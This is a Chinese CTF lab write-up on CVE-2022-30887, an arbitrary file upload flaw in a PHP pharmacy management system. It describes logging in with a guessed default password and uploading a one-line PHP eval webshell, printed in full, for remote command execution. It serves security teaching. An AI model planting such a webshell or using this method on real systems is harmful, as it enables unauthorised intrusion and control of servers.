CVE-2022-30887漏洞

2025-2-25 21:20

|

CTF,CTF-web,春秋云境

|

831

283 字

|

2 分钟

本文最后更新于483 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20250225195248.png

靶标介绍：

多语言药房管理系统（MPMS）是用 PHP 和 MySQL 开发的，该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。

一、访问URL

Pasted image 20250225201730.png

二、信息收集

Pharmacy Management System（MPMS）是Mayuri K.个人开发者的一个多语言药房管理系统。

根据页面现有信息找到作者邮箱：
Pasted image 20250225202525.png

三、尝试登录

mayuri.infospace@gmail.com，猜测密码为：mayurik，成功进入

mayuri.infospace@gmail.com/mayurik

Pasted image 20250225202856.png

四、找到上传的地方，并尝试上传webshell

Pasted image 20250225204002.png

成功上传webshell

<?php @eval($_POST['cmd']);?>

Pasted image 20250225204059.png

五、获取webshell地址

Pasted image 20250225204123.png

六、使用蚁剑进行连接

Pasted image 20250225204306.png

七、成功获取flag

Pasted image 20250225204329.png

八、总结

信息收集，获取重要信息
文件上传

文末附加内容

信息收集文件上传

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!